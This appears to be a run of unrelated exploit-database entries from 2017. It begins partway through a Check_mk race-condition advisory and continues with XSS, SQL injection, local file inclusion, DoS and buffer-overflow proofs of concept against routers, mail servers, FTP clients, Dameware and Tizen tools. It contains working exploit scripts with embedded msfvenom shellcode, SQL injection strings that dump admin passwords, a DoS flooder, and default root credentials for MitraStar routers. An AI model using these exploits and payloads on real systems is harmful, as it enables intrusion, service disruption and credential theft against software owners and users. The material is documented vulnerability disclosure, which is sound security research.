Content-Disposition: form-data; name="_login"
1
---9519178121294961341040589727
Content-Disposition: form-data; name="_origtarget"
index.py
---9519178121294961341040589727
Content-Disposition: form-data; name="_username"
omdadmin
---9519178121294961341040589727
Content-Disposition: form-data; name="_password"
welcome
---9519178121294961341040589727
Content-Disposition: form-data; name="_login"
Login
---9519178121294961341040589727--
Then it could happen that one of both os.rename() calls references a non-
existing file, which has just been renamed by a previous thread. This causes the
Python script to fail and throw a crash report, which discloses a variety of
sensitive information, such as internal server paths, account details including
hashed passwords:
</pre></td></tr><tr class="data odd0"><td class="left">Local Variables</td><td><pre>{'contacts': {u'admin': {'alias': u'Administrator',
'contactgroups': ['all'],
'disable_notifications': False,
'email': u'admin@example.com',
'enforce_pw_change': False,
'last_pw_change': 0,
'last_seen': 0.0,
'locked': False,
'num_failed': 0,
'pager': '',
'password': '$1$400000$13371337asdfasdf',
'roles': ['admin'],
'serial': 2},
A script to automatically exploit this vulnerability can be found on [0].
6. POC
======
#!/usr/bin/python
# Exploit Title: Check_mk <=3D v1.2.8p25 save_users() Race Condition
# Version: <=3D 1.2.8p25
# Date: 2017-10-18
# Author: Julien Ahrens (@MrTuxracer)
# Homepage: https://www.rcesecurity.com
# Software Link: https://mathias-kettner.de/check_mk.html
# Tested on: 1.2.8p25
# CVE:=09=09 CVE-2017-14955
#
# Howto / Notes:
# This scripts exploits the Race Condition in check_mk version 1.2.8p25 and
# below as described by CVE-2017-14955. You only need a valid username to
# dump all encrypted passwords and make sure to setup a local proxy to
# catch the dump. Happy brute forcing ;-)
import requests
import threading
try:
=09from requests.packages.urllib3.exceptions import InsecureRequestWarning
=09requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
except:
=09pass
# Config Me
target_url =3D "https://localhost/check_mk/login.py"
target_username =3D "omdadmin"
proxies =3D {
'http': 'http://127.0.0.1:8080',
'https': 'http://127.0.0.1:8080',
}
def make_session():
=09v =3D requests.post(target_url, verify=3DFalse, proxies=3Dproxies, files=
=3D{'filled_in': (None, 'login'), '_login': (None, '1'), '_origtarget': (No=
ne, 'index.py'), '_username': (None, target_username), '_password': (None, =
'random'), '_login': (None, 'Login')})
=09return v.content
NUM =3D 50
threads =3D []
for i in range(NUM):
t =3D threading.Thread(target=3Dmake_session)
threads.append(t)
t.start()
7. RISK
=======
To successfully exploit this vulnerability an unauthenticated attacker must only
have network-level access to the application.
The vulnerability allows remote attackers to trigger an exception, which
discloses a variety of sensitive internal information such as:
- Local server paths
- Usernames
- Passwords (hashed)
- and user directory-specific attributes (i.e. LDAP)
8. SOLUTION
===========
Update to 1.2.8p26.
9. REPORT TIMELINE
==================
2017-09-21: Discovery of the vulnerability
2017-09-21: Sent limited information to publicly listed email address
2017-09-21: Vendor responds and asks for details
2017-09-21: Full vulnerability details sent to vendor
2017-09-25: Vendor pushes fix to git
2017-10-01: MITRE assigns CVE-2017-14955
2017-10-16: Fix confirmed
2017-10-18: Public disclosure
10. REFERENCES
=============
[0] https://www.rcesecurity.com/2017/10/cve-2017-14955-win-a-race-against-check-mk-to-dump-all-your-login-data/
[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14955
# Exploit Title: Vulnerability Xss - TP-LINK TL-MR3220
# Date: 12/10/2017
# Exploit Author: Thiago "THX" Sena
# Vendor Homepage: http://www.tp-link.com.br
# Version: TL-MR3220
# Tested on: Windows 10
# CVE : CVE-2017-15291
Vulnerabilty: Cross-site scripting (XSS) in TP-LINK TL-MR3220
cve: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15291
---------------------------------------------------------------
PoC:
0x01 - First you go to ( http://IP:PORT/ )
0x02 - In the 'Wireless MAC Filtering' tab.
0x03 - Will add a new MAC Address.
0x04 - In 'Description' it will put the script ( <script>alert('XSS')</script> ) and complete the registration.
0x05 - Xss Vulnerability
--------------------------------------------------------------
# Exploit Title: DOM Based Cross Site Scripting (XSS) - Logitech Media Server
# Shodan Dork: Logitech Media Server
# Date: 14/10/2017
# Exploit Author: Thiago "THX" Sena
# Vendor Homepage: https://www.logitech.com
# Tested on: windows 10
# CVE : CVE-2017-15687
-----------------------------------------------
PoC:
- First you go to ( http://IP:PORT/ )
- Then put the script ( <BODY ONLOAD=alert(document.cookie)> )
- ( http://IP:PORT/<BODY ONLOAD=alert(document.cookie)> )
- Xss Vulnerability
---------------------------------------------------
[Versões Afetadas]
7.7.3
7.7.5
7.9.1
7.7.2
7.7.1
7.7.6
7.9.0
[Request]
GET /%3Cbody%20onload=alert('Xss')%3E HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: Squeezebox-expandPlayerControl=true; Squeezebox-expanded-MY_MUSIC=0; Squeezebox-expanded-RADIO=0; Squeezebox-expanded-PLUGIN_MY_APPS_MODULE_NAME=0; Squeezebox-expanded-FAVORITES=0; Squeezebox-expanded-PLUGINS=0
Connection: close
Upgrade-Insecure-Requests: 1
#!/usr/bin/env python
# coding: utf-8
############ Description: ##########
# The vulnerability was discovered during a vulnerability research lecture.
#
# Denial-of-service vulnerability in ArGoSoft Mini Mail Server 1.0.0.2
# and earlier allows remote attackers to waste CPU resources (memory
# consumption) via unspecified vectors.
####################################
# Exploit Title: ArGoSoft Mini Mail Server - DoS (Memory Consumption)
# Date: 2017-10-21
# Exploit Author: Berk Cem Göksel
# Contact: twitter.com/berkcgoksel || bgoksel.com
# Vendor Homepage: http://www.argosoft.com
# Software Link: http://www.argosoft.com/rootpages/MiniMail/Default.aspx
# Version: 1.0.0.2
# Tested on: Windows 10
# Category: Windows Remote Denial-of-Service
# CVE : CVE-2017-15223
import socket
from threading import Thread
def data():
ip = '127.0.0.1'
port = 25
counter = 50
string = '&'
while True:
try:
if counter >= 10000:
counter = 0
else:
counter = counter + 50
A = (string * counter) + 'user2@othermail.com'
print "String lenght: " + str(len(A))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5.0)
sock.connect((ip, port))
sock.send('HELO localhost\r\n' + 'MAIL FROM: user1@somemail.com\r\n' + 'RCPT TO: ' + A + '\r\nDATA\r\nMessage-ID:1224\r\SDFGQUIL\r\n"."\r\n' + 'QUIT\r\n')
sock.recv(1024)
sock.close()
except Exception as e:
continue
def main():
iterations = int(input("Threads: "))
for i in range(iterations):
t = Thread(target=data)
t.start()
if __name__ == '__main__':
main()
#!/usr/bin/env python
# coding: utf-8
############ Description: ##########
# The vulnerability was discovered during a vulnerability research lecture.
# This is meant to be a PoC.
####################################
# Exploit Title: Ayukov NFTP FTP Client - Buffer Overflow
# Date: 2017-10-21
# Exploit Author: Berk Cem Göksel
# Contact: twitter.com/berkcgoksel || bgoksel.com
# Vendor Homepage: http://ayukov.com/nftp/source-release.html
# Software Link: ftp://ftp.ayukov.com/pub/nftp/
# Version: v1.71, v1.72, v1.8, v2.0
# Tested on: Windows 10
# Category: Windows Remote Exploit
# CVE : CVE-2017-15222
import socket
IP = '127.0.0.1'
port = 21
#(exec calc.exe)
shellcode=(
"\xda\xc5\xbe\xda\xc6\x9a\xb6\xd9\x74\x24\xf4\x5d\x2b\xc9\xb1"
"\x33\x83\xc5\x04\x31\x75\x13\x03\xaf\xd5\x78\x43\xb3\x32\xf5"
"\xac\x4b\xc3\x66\x24\xae\xf2\xb4\x52\xbb\xa7\x08\x10\xe9\x4b"
"\xe2\x74\x19\xdf\x86\x50\x2e\x68\x2c\x87\x01\x69\x80\x07\xcd"
"\xa9\x82\xfb\x0f\xfe\x64\xc5\xc0\xf3\x65\x02\x3c\xfb\x34\xdb"
"\x4b\xae\xa8\x68\x09\x73\xc8\xbe\x06\xcb\xb2\xbb\xd8\xb8\x08"
"\xc5\x08\x10\x06\x8d\xb0\x1a\x40\x2e\xc1\xcf\x92\x12\x88\x64"
"\x60\xe0\x0b\xad\xb8\x09\x3a\x91\x17\x34\xf3\x1c\x69\x70\x33"
"\xff\x1c\x8a\x40\x82\x26\x49\x3b\x58\xa2\x4c\x9b\x2b\x14\xb5"
"\x1a\xff\xc3\x3e\x10\xb4\x80\x19\x34\x4b\x44\x12\x40\xc0\x6b"
"\xf5\xc1\x92\x4f\xd1\x8a\x41\xf1\x40\x76\x27\x0e\x92\xde\x98"
"\xaa\xd8\xcc\xcd\xcd\x82\x9a\x10\x5f\xb9\xe3\x13\x5f\xc2\x43"
"\x7c\x6e\x49\x0c\xfb\x6f\x98\x69\xf3\x25\x81\xdb\x9c\xe3\x53"
"\x5e\xc1\x13\x8e\x9c\xfc\x97\x3b\x5c\xfb\x88\x49\x59\x47\x0f"
"\xa1\x13\xd8\xfa\xc5\x80\xd9\x2e\xa6\x47\x4a\xb2\x07\xe2\xea"
"\x51\x58")
CALL_ESP = "\xdd\xfc\x40\x00" # call esp - nftpc.exe #0040FCDD
buff = "A" * 4116 + CALL_ESP + '\x90' * 16 + shellcode + "C" * (15000-4116-4-16-len(shellcode))
#Can call esp but the null byte terminates the string.
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((IP, port))
s.listen(20)
print("[i] FTP Server started on port: "+str(port)+"\r\n")
except:
print("[!] Failed to bind the server to port: "+str(port)+"\r\n")
while True:
conn, addr = s.accept()
conn.send('220 Welcome!' + '\r\n')
print conn.recv(1024)
conn.send('331 OK.\r\n')
print conn.recv(1024)
conn.send('230 OK.\r\n')
print conn.recv(1024)
conn.send(buff + '\r\n')
print conn.recv(1024)
conn.send('257' + '\r\n')
# Exploit Title: CometChat < v6.2.0 BETA 1 - Local File Inclusion
# Date: 2017-10-22
# Exploit Author: Luke Paris (Paradoxis) <luke@paradoxis.nl>
# Vendor Homepage: https://cometchat.com/
# Version: < 6.2.0 BETA 1
# Tested on: Ubuntu Linux 14.04
#
# --------------------------------------------------------------------------------------
#
# In versions of CometChat before version v6.2.0 BETA 1 a bug existed which allowed
# any unauthorised attacker to modify the include path of a php file by sending an
# HTTP request with a crafted 'cc_lang' cookie.
#
# If successfully exploited an attacker could leverage this bug to execute arbitrary PHP
# code which resides somewhere else on the server (eg: uploaded via an upload form).
#
# Due to the fact that this bug resides in the configuration file of the applications
# it might be possible that future versions of the chat application still contain the
# file inclusion bug as the script might have been re-applied after an update.
#
# --------------------------------------------------------------------------------------
#
# The vulnerability resides in the application's configuration file, near the beginning
# of the script the following code block is executed, this is where an attacker is able
# to inject a string into the cc_lang cookie.
/* COOKIE */
$cookiePrefix = 'cc_';
/* LANGUAGE START */
$lang = 'en';
/* LANGUAGE END */
if (!empty($_COOKIE[$cookiePrefix."lang"])) {
$lang = $_COOKIE[$cookiePrefix."lang"];
}
# Near the end of the configuration file, the following code block is executed.
# This is where the exploit is triggered by not sanitising the $lang variable properly.
include dirname(__FILE__).DIRECTORY_SEPARATOR.'lang'.DIRECTORY_SEPARATOR.'en.php';
if (file_exists(dirname(__FILE__).DIRECTORY_SEPARATOR.'lang'.DIRECTORY_SEPARATOR.$lang.'.php')) {
include dirname(__FILE__).DIRECTORY_SEPARATOR.'lang'.DIRECTORY_SEPARATOR.$lang.'.php';
}
# The following example demonstrates how an attacker could leverage this bug to gain control
# over the server, which could result in a full server compromise (assuming the attacker has
# already managed to write a webshell to the servers' disk somehow):
GET /cometchat/config.php?cmd=id HTTP/1.1
Host: example.com
Connection: keep-alive
Cookie: cc_lang=../../uploads/evil
HTTP/1.1 200 OK
Host: example.com
Connection: close
Content-type: text/html; charset=UTF-8
uid=33(www-data) gid=33(www-data) groups=33(www-data)
# # # # #
# Exploit Title: AROX School ERP PHP Script - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://arox.in/
# Software Link: https://www.codester.com/items/4908/arox-school-erp-php-script
# Demo: http://erp1.arox.in/
# Version: CVE-2017-15978
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/office_admin/?pid=95&action=print_charactercertificate&id=[SQL]
# http://localhost/[PATH]/office_admin/?pid=95&action=edit&id=3[SQL]
#
# Parameter: id (GET)
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: pid=95&action=print_charactercertificate&id=3 AND SLEEP(5)
#
# Parameter: id (GET)
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: pid=95&action=edit&id=3 AND SLEEP(5)
#
# Etc..
# # # # #
# Exploit Title: Dameware Remote Controller RCE
# Date: 3-04-2016
# Exploit Author: Securifera
# Vendor Homepage: http://www.dameware.com/products/mini-remote-control/product-overview.aspx
# Version: 12.0.0.520
# Website: https://www.securifera.com/blog/2016/04/03/fun-with-remote-controllers-dameware-mini-remote-control-cve-2016-2345/
# CVE : CVE-2016-2345
import socket
import sys
import os
import time
import struct
import binascii
import random
# windows/exec - 220 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
# CMD=calc.exe
sc = ""
sc += "\xba\x01\xa8\x4f\x9e\xd9\xca\xd9\x74\x24\xf4\x5e\x29"
sc += "\xc9\xb1\x31\x31\x56\x13\x03\x56\x13\x83\xee\xfd\x4a"
sc += "\xba\x62\x15\x08\x45\x9b\xe5\x6d\xcf\x7e\xd4\xad\xab"
sc += "\x0b\x46\x1e\xbf\x5e\x6a\xd5\xed\x4a\xf9\x9b\x39\x7c"
sc += "\x4a\x11\x1c\xb3\x4b\x0a\x5c\xd2\xcf\x51\xb1\x34\xee"
sc += "\x99\xc4\x35\x37\xc7\x25\x67\xe0\x83\x98\x98\x85\xde"
sc += "\x20\x12\xd5\xcf\x20\xc7\xad\xee\x01\x56\xa6\xa8\x81"
sc += "\x58\x6b\xc1\x8b\x42\x68\xec\x42\xf8\x5a\x9a\x54\x28"
sc += "\x93\x63\xfa\x15\x1c\x96\x02\x51\x9a\x49\x71\xab\xd9"
sc += "\xf4\x82\x68\xa0\x22\x06\x6b\x02\xa0\xb0\x57\xb3\x65"
sc += "\x26\x13\xbf\xc2\x2c\x7b\xa3\xd5\xe1\xf7\xdf\x5e\x04"
sc += "\xd8\x56\x24\x23\xfc\x33\xfe\x4a\xa5\x99\x51\x72\xb5"
sc += "\x42\x0d\xd6\xbd\x6e\x5a\x6b\x9c\xe4\x9d\xf9\x9a\x4a"
sc += "\x9d\x01\xa5\xfa\xf6\x30\x2e\x95\x81\xcc\xe5\xd2\x7e"
sc += "\x87\xa4\x72\x17\x4e\x3d\xc7\x7a\x71\xeb\x0b\x83\xf2"
sc += "\x1e\xf3\x70\xea\x6a\xf6\x3d\xac\x87\x8a\x2e\x59\xa8"
sc += "\x39\x4e\x48\xcb\xdc\xdc\x10\x22\x7b\x65\xb2\x3a"
port = 6129
if len (sys.argv) == 2:
(progname, host ) = sys.argv
else:
print len (sys.argv)
print 'Usage: {0} host'.format (sys.argv[0])
exit (1)
csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
csock.connect ( (host, int(port)) )
type = 444.0
buf = struct.pack("I", 4400 ) #Init Version
buf += "\xcc"*4
buf += struct.pack("d", type) #Minor Version
buf += struct.pack("d", type) #Minor Version
buf += (40 - len(buf)) * "C"
csock.send(buf)
wstr = "\x90" * 0x10 #nop sled
wstr += sc #calc shellcode
wstr += "\x90" * (0x2ac - 0x10 - len(sc))
wstr += "\xeb\x06\xff\xff" #short jump forward
wstr += struct.pack("I", 0x00401161 ) #pop pop return gadget
wstr += "\x90" * 3 #nop
wstr += "\xe9\x6b\xfa\xff\xff" #short jump back to shellcode
wstr += "E" * 0xbc
wstr += ("%" + "\x00" + "c" + "\x00")*5
buf = struct.pack("I", 0x9c44) #msg type
buf += wstr #payload
buf += "\x00" * (0x200) #null bytes
csock.send(buf)
print binascii.hexlify(csock.recv(0x4000)) #necessary reads
print binascii.hexlify(csock.recv(0x4000))
csock.close()
# Exploit Title: Smart Development Bridge <=2.3.2 (part of Tizen Studio 1.3 Windows x86/x64) - Buffer Overflow PoC
# Date: 22.10.17
# Exploit Author: Marcin Kopec
# Vendor Homepage: https://developer.tizen.org/
# Software Link: https://developer.tizen.org/development/tizen-studio/download#
# Version: 2.3.0, 2.3.2 (some older versions are affected as well)
# Tested on: Microsoft Windows [Version 10.0.16299.19]
# 2.3.2 (sdb.exe can be extracted from Tizen Studio 1.3 for Windows x86/x64 installation package):
# e88de99ee069412b7612d85c00aa62fc sdb.exe
# 2.3.0:
# f9fd3896195900ec604c6f182a411e18 sdb.exe
# The file can be located in "tools" subdirectory after the extraction
# This code has been created for educational purposes only, to raise awareness on software security, and it's harmless
# by intention (the PoC runs calc.exe). Please do not change the code behaviour to malicious
# Vulnerability Discovery History
# 28/Jul/16 - Tizen Project has been informed about the vulnerability (https://bugs.tizen.org/browse/TM-249)
# 28/Jul/16 - Got suggestion from CL to inform Tizen Mobile project
# 29/Jul/16 - Moved the issue to Tizen Mobile project
# - NO RESPONSE -
# 7/Sep/16 - Escalated through Samsung security contact (BZ)
# 14/Nov/16 - Got informed by BZ that HQ is dealing with the issue with no further details
# - NO RESPONSE -
# 02/Oct/17 - Tizen Mobile project has been informed about plans to release PoC on exploit-db
# - NO RESPONSE -
# 22/Oct/17 - The PoC submitted to exploit-db
import struct
import subprocess
import sys
ARGS = " launch A A A A A "
def tech_direct_exec(sdb_path):
# msfvenom -a x86 --platform Windows -p windows/exec CMD=calc -e x86/shikata_ga_nai \
# -b '\x00\x20\x0a\x0d\x1b\x0b\x0c' -f python
buf = ""
buf += "\xb8\xb6\x98\xe6\xfa\xdb\xcb\xd9\x74\x24\xf4\x5b\x31"
buf += "\xc9\xb1\x30\x31\x43\x13\x83\xeb\xfc\x03\x43\xb9\x7a"
buf += "\x13\x06\x2d\xf8\xdc\xf7\xad\x9d\x55\x12\x9c\x9d\x02"
buf += "\x56\x8e\x2d\x40\x3a\x22\xc5\x04\xaf\xb1\xab\x80\xc0"
buf += "\x72\x01\xf7\xef\x83\x3a\xcb\x6e\x07\x41\x18\x51\x36"
buf += "\x8a\x6d\x90\x7f\xf7\x9c\xc0\x28\x73\x32\xf5\x5d\xc9"
buf += "\x8f\x7e\x2d\xdf\x97\x63\xe5\xde\xb6\x35\x7e\xb9\x18"
buf += "\xb7\x53\xb1\x10\xaf\xb0\xfc\xeb\x44\x02\x8a\xed\x8c"
buf += "\x5b\x73\x41\xf1\x54\x86\x9b\x35\x52\x79\xee\x4f\xa1"
buf += "\x04\xe9\x8b\xd8\xd2\x7c\x08\x7a\x90\x27\xf4\x7b\x75"
buf += "\xb1\x7f\x77\x32\xb5\xd8\x9b\xc5\x1a\x53\xa7\x4e\x9d"
buf += "\xb4\x2e\x14\xba\x10\x6b\xce\xa3\x01\xd1\xa1\xdc\x52"
buf += "\xba\x1e\x79\x18\x56\x4a\xf0\x43\x3c\x8d\x86\xf9\x72"
buf += "\x8d\x98\x01\x22\xe6\xa9\x8a\xad\x71\x36\x59\x8a\x8e"
buf += "\x7c\xc0\xba\x06\xd9\x90\xff\x4a\xda\x4e\xc3\x72\x59"
buf += "\x7b\xbb\x80\x41\x0e\xbe\xcd\xc5\xe2\xb2\x5e\xa0\x04"
buf += "\x61\x5e\xe1\x66\xe4\xcc\x69\x69"
stack_adj = "\x83\xEC\x7F" * 2 # SUB ESP,0x7F - stack adjustment
sc = stack_adj + buf
eip = "\x01\xed\x8b" # 008BED01 - 3 byte EIP overwrite
payload = "B" * 2000 + "\x90" * (2086 - len(sc) - 1) + "\x90" + sc + eip
print "Trying to exploit the binary... "
print "Payload length: " + str(len(payload))
print sdb_path + ARGS + payload
subprocess.Popen([sdb_path, "launch", "A", "A", "A", "A", "A", payload], stdout=subprocess.PIPE)
def tech_social_ascii(sdb_path, jmp_esp_addr):
eip = struct.pack('<L', int(jmp_esp_addr, 0))
# msfvenom -a x86 --platform Windows -p windows/exec CMD=calc -e x86/alpha_mixed BufferRegister=ESP -f python
buf = ""
buf += "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += "\x6b\x4c\x4d\x38\x4e\x62\x77\x70\x63\x30\x35\x50\x71"
buf += "\x70\x6f\x79\x79\x75\x50\x31\x69\x50\x62\x44\x6c\x4b"
buf += "\x32\x70\x34\x70\x6e\x6b\x76\x32\x36\x6c\x6c\x4b\x63"
buf += "\x62\x45\x44\x6e\x6b\x61\x62\x37\x58\x76\x6f\x6f\x47"
buf += "\x70\x4a\x51\x36\x44\x71\x69\x6f\x4c\x6c\x45\x6c\x55"
buf += "\x31\x61\x6c\x36\x62\x54\x6c\x47\x50\x39\x51\x78\x4f"
buf += "\x74\x4d\x67\x71\x69\x57\x68\x62\x6b\x42\x36\x32\x53"
buf += "\x67\x4c\x4b\x61\x42\x52\x30\x6c\x4b\x31\x5a\x67\x4c"
buf += "\x4e\x6b\x32\x6c\x57\x61\x53\x48\x59\x73\x62\x68\x67"
buf += "\x71\x48\x51\x36\x31\x6c\x4b\x31\x49\x47\x50\x35\x51"
buf += "\x38\x53\x6e\x6b\x30\x49\x55\x48\x68\x63\x34\x7a\x31"
buf += "\x59\x4c\x4b\x50\x34\x6c\x4b\x33\x31\x5a\x76\x70\x31"
buf += "\x6b\x4f\x6c\x6c\x79\x51\x78\x4f\x46\x6d\x35\x51\x58"
buf += "\x47\x50\x38\x39\x70\x70\x75\x79\x66\x64\x43\x43\x4d"
buf += "\x4c\x38\x55\x6b\x63\x4d\x61\x34\x70\x75\x6d\x34\x72"
buf += "\x78\x4e\x6b\x61\x48\x45\x74\x47\x71\x78\x53\x72\x46"
buf += "\x6c\x4b\x44\x4c\x62\x6b\x4c\x4b\x51\x48\x35\x4c\x43"
buf += "\x31\x69\x43\x6c\x4b\x67\x74\x4e\x6b\x55\x51\x6e\x30"
buf += "\x6b\x39\x50\x44\x65\x74\x37\x54\x53\x6b\x63\x6b\x73"
buf += "\x51\x72\x79\x71\x4a\x72\x71\x4b\x4f\x59\x70\x43\x6f"
buf += "\x33\x6f\x32\x7a\x4e\x6b\x62\x32\x5a\x4b\x4e\x6d\x51"
buf += "\x4d\x32\x4a\x65\x51\x6e\x6d\x6b\x35\x6e\x52\x55\x50"
buf += "\x73\x30\x63\x30\x46\x30\x30\x68\x55\x61\x4c\x4b\x52"
buf += "\x4f\x4f\x77\x69\x6f\x5a\x75\x4d\x6b\x6c\x30\x6f\x45"
buf += "\x4c\x62\x53\x66\x30\x68\x79\x36\x4a\x35\x4d\x6d\x6f"
buf += "\x6d\x6b\x4f\x39\x45\x75\x6c\x55\x56\x53\x4c\x56\x6a"
buf += "\x6b\x30\x39\x6b\x6b\x50\x64\x35\x76\x65\x4d\x6b\x32"
buf += "\x67\x42\x33\x62\x52\x32\x4f\x71\x7a\x45\x50\x31\x43"
buf += "\x69\x6f\x6e\x35\x61\x73\x31\x71\x52\x4c\x73\x53\x75"
buf += "\x50\x41\x41"
stack_adj = "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A"
stack_adj += "\x2d\x66\x4f\x66\x47\x2d\x4c\x31\x4c\x36\x2d\x67\x39\x6a\x2a\x2d\x57\x57\x57\x57\x50"
stack_adj += "\x50\x5C" + "A" * 4
ascii_nop_sleed = "C" * 70
payload = sdb_path + ARGS + "A" * 4086 + eip + "\x77\x21\x42\x42\x20" + ascii_nop_sleed + stack_adj + buf
print "Now sdb.exe user could be asked to run the following code from cmd line:"
print payload
f = open("sdb_poc.txt", 'w')
f.write(payload)
f.close()
print "The payload has been also saved to sdb_poc.txt file for your convenience"
def bonus_exercise():
print """Can you spot the bug here?
int launch_app(int argc, char** argv)
{
static const char *const SHELL_LAUNCH_CMD = "shell:/usr/bin/sdk_launch_app ";
char full_cmd[4096];
int i;
snprintf(full_cmd, sizeof full_cmd, "%s", SHELL_LAUNCH_CMD);
for (i=1 ; i<argc ; i++) {
strncat(full_cmd, " ", sizeof(full_cmd)-strlen(" ")-1);
strncat(full_cmd, argv[i], sizeof(full_cmd)-strlen(argv[i])-1);
}
}
"""
def usage():
print """Smart Development Bridge <=2.3.2 (part of Tizen Studio 1.3 Windows x86/x64) - Buffer Overflow PoC
by Marcin Kopec <m a r c i n \. k o p e c @ h o t m a i l . c o m>
Demonstrated Exploitation Techniques:
1: Direct execution, 3-byte EIP overwrite, Stack adjustment
2: Payload for social engineering attack, JMP ESP (!mona find -s "\\xff\\xe4" -cp alphanum), Alphanumeric shellcode
3: Bonus exercise - source code analysis
This code has been created for educational purposes only, to raise awareness on software security, and it's harmless
by intention (the PoC runs calc.exe). Please do not change the code behaviour to malicious
Usage: python sdbBOpoc.py [Technique_ID] [Path_to_sdb.exe] [Address_of_JMP_ESP]
Examples: python sdbBOpoc.py 1 C:\Tizen\Tools\sdb.exe
python sdbBOpoc.py 2 C:\Tizen\Tools\sdb.exe 0x76476557
python sdbBOpoc.py 3"""
def main():
if len(sys.argv) > 1:
if int(sys.argv[1]) == 1:
if len(sys.argv) == 3:
tech_direct_exec(sys.argv[2])
if int(sys.argv[1]) == 2:
if len(sys.argv) == 4:
tech_social_ascii(sys.argv[2], sys.argv[3])
if int(sys.argv[1]) == 3:
bonus_exercise()
else:
usage()
if __name__ == '__main__':
main()
# Exploit Title: Privilege escalation MitraStar routers
# Date: 28-10-2017
# Exploit Author: j0lama
# Vendor Homepage: http://www.mitrastar.com/
# Provider Homepage: https://www.movistar.com/
# Models affected: MitraStar DSL-100HN-T1 and MitraStar GPT-2541GNAC (HGU)
# Software versions: ES_113WJY0b16 (DSL-100HN-T1) and 1.00(VNJ0)b1 (GPT-2541GNAC)
# Vulnerability analysis: http://jolama.es/temas/router-attack/index.php
Description
-----------
SSH has a bad configuration that allows execute commands when you connect avoiding the default shell that the manufacturer provide us.
$ ssh 1234@ip /bin/sh
This give us a shell with root permissions.
Note: the password for 1234 user is under the router.
You can copy all file system to your local machine using scp.
In some of the MitraStar routers there is a zyad1234 user with password zyad1234 that have the same permissions of the 1234 user (root).
Solution
--------
In the latest firmware versions this have been fixed.
If you try to execute scp, the router's configuration file will be copy to your computer instead of any file as occurred before.
###################################################
[+] Author : Venkat Rajgor
[+] Email : Venki9990@gmail.com
[+] Vulnerability : SQL injection
###################################################
E-mail ID : support@phpsugar.com
Download : http://www.phpsugar.com
Web : http://www.phpsugar.com
Price : $39 USD
###################################################
Vulnerable parameter: http://x.x.x.x/playlists.php?playlist=
Application : PHPSUGAR PHP Melody version 2.6.1
Vulnerability : PHPSUGAR PHP Melody 2.6.1 SQL Injection
###################################################
Description : In PHPSUGAR PHP Melody CMS 2.6.1, SQL Injection exists via the playlist parameter to playlists.php.
Payload Used : ' UNION SELECT null,concat(0x223c2f613e3c2f64 69763e3c2f6469763e,version(),0 x3c212d2d),null,null,null,null ,null,null,null,null,null-- -
# # # # #
# Exploit Title: Newspaper Magazine & Blog CMS 1.0 - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://geniusocean.com/
# Software Link: https://codecanyon.net/item/mymagazine-fully-responsive-magazine-cms/19493325
# Demo: http://demo.geniusocean.com/newspaper/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15981
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/admin/admin_process.php?act=editpollform&id=[SQL]
#
# -2'++/*!00022UNION*/+/*!00022SELECT*/+0x31,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),0x33,0x34,0x35,VerSiOn(),dAtAbAsE(),0x38,0x39,0x3130,0x3131,0x3132--+-
#
# http://localhost/[PATH]/admin/admin_process.php?act=cateditform&id=[SQL]
#
# -2'++/*!00022UNION*/+/*!00022SELECT*/+0x31,/*!00022cOnCat*/(username,0x3a,password),0x33,0x34,0x35+/*!00022from*/+admin--+-
#
# Etc..
# # # # #
# # # # #
# Exploit Title: US Zip Codes Database Script - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://rowindex.com/
# Software Link: https://www.codester.com/items/4898/us-zip-codes-database-php-script
# Demo: http://rowindex.com/demo/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15980
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?action=lookup-county&state=[SQL]
#
# 11'+/*!08888UniOn*/+/*!08888Select*/+(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2))--+-
#
# Parameter: state (GET)
# Type: UNION query
